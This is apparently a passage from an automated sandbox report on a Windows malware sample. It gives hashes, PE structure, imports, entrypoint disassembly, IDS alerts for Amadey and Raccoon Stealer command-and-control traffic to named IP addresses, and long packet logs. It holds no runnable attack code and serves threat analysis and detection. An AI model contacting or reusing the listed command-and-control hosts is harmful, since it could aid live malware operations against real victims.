                                                            SHA-512:92012D9893E86466E40DEB84A601B2DF14C0FA20E973F113D39454CD0EF94AEDE225277C64F5EDF1938A1F6969ACF53B2AC564B763D7956DE11929B2D3E987E6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...2.*_......................p.....p.............@...........................t.................................................P....`s..?....................s.<...0...............................8...@............................................text............................... ..`.data....io.........................@....mehepek.....Ps.....................@....rsrc....?...`s..@..................@..@.reloc..."....s..$... ..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Roaming\jejhieg:Zone.Identifier
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:unknown
                                                            Preview: [ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.005613916547972
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:cnv622JnZv.exe
                                                            File size:345088
                                                            MD5:5ae3b69c31fe729ac672ba483280f16d
                                                            SHA1:310d993f9fbe7fb9cf3892220d980e08eb5e6286
                                                            SHA256:033247a6ba1cd0543f27857fb6743e16fdd2990cea1df3dce93e4031c8046d1a
                                                            SHA512:92012d9893e86466e40deb84a601b2df14c0fa20e973f113d39454cd0ef94aede225277c64f5edf1938a1f6969acf53b2ac564b763d7956de11929b2d3e987e6
                                                            SSDEEP:6144:Y5uWaxsOBlJyeq8PStBStFgykET6+lWx:QvRO8R8PStBS4ykETW
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...2.*_...................

                                                            File Icon

                                                            Icon Hash:aedaae9ecea62aa2

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x41c870
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x5F2AA232 [Wed Aug 5 12:12:34 2020 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:5243e0b7a8cb0f582099146f832c26e4

                                                            Entrypoint Preview

                                                            Instruction
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            call 00007FDB84C6672Bh
                                                            call 00007FDB84C5FB06h
                                                            pop ebp
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            push FFFFFFFEh
                                                            push 0043C090h
                                                            push 00426530h
                                                            mov eax, dword ptr fs:[00000000h]
                                                            push eax
                                                            add esp, FFFFFF98h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            mov eax, dword ptr [0043E1D4h]
                                                            xor dword ptr [ebp-08h], eax
                                                            xor eax, ebp
                                                            push eax
                                                            lea eax, dword ptr [ebp-10h]
                                                            mov dword ptr fs:[00000000h], eax
                                                            mov dword ptr [ebp-18h], esp
                                                            mov dword ptr [ebp-70h], 00000000h
                                                            lea eax, dword ptr [ebp-60h]
                                                            push eax
                                                            call dword ptr [00401074h]
                                                            cmp dword ptr [02B339A0h], 00000000h
                                                            jne 00007FDB84C5FB00h
                                                            push 00000000h
                                                            push 00000000h
                                                            push 00000001h
                                                            push 00000000h
                                                            call dword ptr [00401100h]
                                                            call 00007FDB84C5FC83h
                                                            mov dword ptr [ebp-6Ch], eax
                                                            call 00007FDB84C696EBh
                                                            test eax, eax
                                                            jne 00007FDB84C5FAFCh
                                                            push 0000001Ch
                                                            call 00007FDB84C5FC40h
                                                            add esp, 04h
                                                            call 00007FDB84C64EC8h
                                                            test eax, eax
                                                            jne 00007FDB84C5FAFCh
                                                            push 00000010h
                                                            call 00007FDB84C5FC2Dh
                                                            add esp, 04h
                                                            push 00000001h
                                                            call 00007FDB84C69693h
                                                            add esp, 04h
                                                            call 00007FDB84C674ABh
                                                            mov dword ptr [ebp-04h], 00000000h
                                                            call 00007FDB84C6708Fh
                                                            test eax, eax

                                                            Rich Headers

                                                            Programming Language:
                                                            • [LNK] VS2010 build 30319
                                                            • [ASM] VS2010 build 30319
                                                            • [ C ] VS2010 build 30319
                                                            • [C++] VS2010 build 30319
                                                            • [RES] VS2010 build 30319
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c6c40x50.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27360000x3fa8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x273a0000x1b3c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bd380x40.text
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x3c2000x3c200False0.600035732848data7.00461715058IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x26f69a40x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .mehepek0x27350000x2e50x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x27360000x3fa80x4000False0.735107421875data6.34809839082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x273a0000x1221c0x12400False0.0804125642123data1.04172681821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_CURSOR0x2739ae00x130dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_ICON0x27363400x25a8dataSpanishParaguay
                                                            RT_ICON0x27388e80x10a8dataSpanishParaguay
                                                            RT_STRING0x2739d580x96dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_STRING0x2739df00x1b6dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_ACCELERATOR0x2739a200x90dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_ACCELERATOR0x27399b80x68dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_GROUP_CURSOR0x2739c100x14dataDivehi; Dhivehi; MaldivianMaldives
                                                            RT_GROUP_ICON0x27399900x22dataSpanishParaguay
                                                            RT_VERSION0x2739c280x130dataDivehi; Dhivehi; MaldivianMaldives
                                                            None0x2739ac00xadataDivehi; Dhivehi; MaldivianMaldives
                                                            None0x2739ad00xadataDivehi; Dhivehi; MaldivianMaldives
                                                            None0x2739ab00xadataDivehi; Dhivehi; MaldivianMaldives

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetConsoleAliasesLengthW, TlsGetValue, GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, QueryDosDeviceA, GetNamedPipeHandleStateA, SetHandleInformation, UnlockFile, FindFirstFileExW, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, GetDriveTypeA, ActivateActCtx, GetPrivateProfileIntA, SetFileShortNameW, ReadConsoleInputA, GetSystemWow64DirectoryW, GetVersionExW, SetDllDirectoryA, IsDBCSLeadByte, GetSystemDirectoryA, CreateActCtxA, CompareStringW, GetStartupInfoW, VerifyVersionInfoW, GetLastError, GetLongPathNameW, SetLastError, GetProcAddress, FindVolumeMountPointClose, GlobalGetAtomNameA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, WriteProfileSectionW, SetSystemTime, GetModuleFileNameA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, GetProcessShutdownParameters, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, TlsAlloc, GetWindowsDirectoryW, GetProfileSectionW, AreFileApisANSI, DeleteFileA, LocalFileTimeToFileTime, CloseHandle, CreateFileW, SetStdHandle, GetConsoleMode, GetConsoleCP, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, IsProcessorFeaturePresent, GetACP, GetOEMCP, IsValidCodePage, TlsSetValue, GetCurrentThreadId, TlsFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, HeapCreate, EnterCriticalSection, LeaveCriticalSection, LoadLibraryW, RtlUnwind, RaiseException, GetStringTypeW, MultiByteToWideChar, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, WideCharToMultiByte, LCMapStringW, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, SetFilePointer, FlushFileBuffers
                                                            USER32.dllGetMenuInfo, GetMessagePos
                                                            WINHTTP.dllWinHttpReadData

                                                            Version Infos

                                                            DescriptionData
                                                            Translations0x0512 0x00ac

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            Divehi; Dhivehi; MaldivianMaldives
                                                            SpanishParaguay

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            10/29/21-20:11:24.062200TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.5185.215.113.45
                                                            10/29/21-20:11:24.873094TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4984780192.168.2.591.219.236.97
                                                            10/29/21-20:13:19.465425ICMP399ICMP Destination Unreachable Host Unreachable192.168.255.2192.168.2.5
                                                            10/29/21-20:13:19.465452ICMP399ICMP Destination Unreachable Host Unreachable192.168.255.2192.168.2.5

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 29, 2021 20:10:11.674714088 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.726025105 CEST8049756185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.726241112 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.726389885 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.726402998 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.805908918 CEST8049756185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.806030035 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.812016964 CEST4975680192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.844012022 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.863275051 CEST8049756185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.895694017 CEST8049757185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.895904064 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.896691084 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.896711111 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:11.947978973 CEST8049757185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.975368977 CEST8049757185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:11.975521088 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.015337944 CEST4975780192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.046334028 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.066912889 CEST8049757185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.099858046 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.099967003 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.100107908 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.200994015 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234684944 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234714985 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234725952 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234739065 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234756947 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234769106 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234790087 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234811068 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234834909 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234858036 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.234857082 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.234884977 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.234915972 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.288600922 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288625956 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288640976 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288657904 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288686991 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.288727999 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.288932085 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288949013 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288964033 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288980007 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.288995028 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289011002 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.289011002 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289027929 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289043903 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289061069 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289076090 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289083004 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.289127111 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.289140940 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289158106 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289186001 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289201021 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289251089 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289258957 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.289267063 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.289308071 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342422009 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342449903 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342462063 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342474937 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342641115 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342654943 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342708111 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342730045 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342753887 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342763901 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342802048 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342812061 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342842102 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342859030 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342890978 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.342905998 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342958927 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.342988968 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343005896 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343022108 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343036890 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343058109 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.343111992 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343118906 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.343128920 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343151093 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343170881 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343199015 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.343259096 CEST4975880192.168.2.5185.98.87.159
                                                            Oct 29, 2021 20:10:12.343528032 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343544960 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343569994 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343586922 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343647957 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343663931 CEST8049758185.98.87.159192.168.2.5
                                                            Oct 29, 2021 20:10:12.343678951 CEST8049758185.98.87.159192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 29, 2021 20:10:11.239000082 CEST6544753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:11.258455038 CEST53654478.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:11.268511057 CEST5244153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:11.671344042 CEST53524418.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:11.823913097 CEST6217653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:11.843478918 CEST53621768.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:12.026576996 CEST5959653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:12.045677900 CEST53595968.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:15.316878080 CEST6529653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:15.686341047 CEST53652968.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:16.149118900 CEST6318353192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:16.168242931 CEST53631838.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:31.227278948 CEST5696953192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:31.514676094 CEST53569698.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:31.690587044 CEST5516153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:31.713120937 CEST53551618.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:31.859009027 CEST5475753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:31.880048990 CEST53547578.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:32.056253910 CEST4999253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:32.423012972 CEST53499928.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:32.567047119 CEST6007553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:32.586476088 CEST53600758.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:36.493403912 CEST5501653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:36.512619019 CEST53550168.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:36.653253078 CEST6434553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:36.672538996 CEST53643458.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:36.809900045 CEST5712853192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:36.829308987 CEST53571288.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:36.975539923 CEST5046353192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:36.994990110 CEST53504638.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:38.630606890 CEST5039453192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:38.652573109 CEST53503948.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:40.465881109 CEST5853053192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:40.485739946 CEST53585308.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:40.632698059 CEST5381353192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:40.652132034 CEST53538138.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:43.579632044 CEST6373253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:43.602001905 CEST53637328.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:44.569708109 CEST5734453192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:44.589178085 CEST53573448.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:44.751832962 CEST5445053192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:44.771209955 CEST53544508.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:44.922758102 CEST5926153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:44.941961050 CEST53592618.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:47.834711075 CEST5715153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:48.220582008 CEST53571518.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:48.419089079 CEST5941353192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:48.438671112 CEST53594138.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:48.582366943 CEST6051653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:48.601681948 CEST53605168.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:48.744607925 CEST5164953192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:48.764193058 CEST53516498.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:48.913070917 CEST6508653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:48.932560921 CEST53650868.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:50.739057064 CEST5643253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:50.758750916 CEST53564328.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:50.911510944 CEST5292953192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:50.930922031 CEST53529298.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:51.080089092 CEST6431753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:51.099366903 CEST53643178.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:51.242697001 CEST6100453192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:51.260781050 CEST53610048.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:51.421006918 CEST5689553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:51.440727949 CEST53568958.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:55.809906960 CEST6237253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:55.827872038 CEST53623728.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:55.985213995 CEST6151553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:56.004759073 CEST53615158.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:56.252724886 CEST5667553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:56.540116072 CEST53566758.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:57.739132881 CEST5717253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:57.758337021 CEST53571728.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:10:59.940984011 CEST5526753192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:10:59.960449934 CEST53552678.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:00.144890070 CEST5096953192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:00.161952019 CEST53509698.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:00.432073116 CEST6436253192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:00.451416016 CEST53643628.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:00.654155970 CEST5476653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:00.673628092 CEST53547668.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:00.987481117 CEST6144653192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:01.006988049 CEST53614468.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:01.209394932 CEST5751553192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:01.228509903 CEST53575158.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:01.419742107 CEST5819953192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:01.439146042 CEST53581998.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:01.612200975 CEST6522153192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:01.631324053 CEST53652218.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:01.787048101 CEST6157353192.168.2.58.8.8.8
                                                            Oct 29, 2021 20:11:01.806180954 CEST53615738.8.8.8192.168.2.5
                                                            Oct 29, 2021 20:11:01.956099033 CEST5656253192.168.2.58.8.8.8
